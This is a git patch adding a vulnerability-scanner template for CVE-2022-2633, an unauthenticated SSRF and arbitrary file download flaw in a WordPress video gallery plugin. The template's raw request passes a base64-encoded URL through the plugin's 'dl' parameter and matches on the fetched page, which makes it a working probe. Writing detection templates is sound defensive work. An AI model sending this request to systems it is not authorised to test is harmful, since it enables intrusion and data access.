From bbb9ed180db3280de93695cfa107fc36e1a79790 Mon Sep 17 00:00:00 2001 From: Aman Date: Wed, 28 Sep 2022 10:20:46 -0700 Subject: [PATCH] Added template for CVE-2022-2633 --- cves/2022/CVE-2022-2633.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2022/CVE-2022-2633.yaml diff --git a/cves/2022/CVE-2022-2633.yaml b/cves/2022/CVE-2022-2633.yaml new file mode 100644 index 0000000000..625d782f37 --- /dev/null +++ b/cves/2022/CVE-2022-2633.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-2633 + +info: + name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability + author: theamanrawat + description: | + Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0). + reference: + - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994 + - https://wordpress.org/plugins/all-in-one-video-gallery/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633 + classification: + cve-id: CVE-2022-2633 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,arbitrary-file-download,ssrf,all-in-one-video-gallery,unauthenticated + +requests: + - raw: + - | + GET /index.php/video/?dl={{base64('http://example.com')}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Example Domain' + + - type: status + status: + - 200 \ No newline at end of file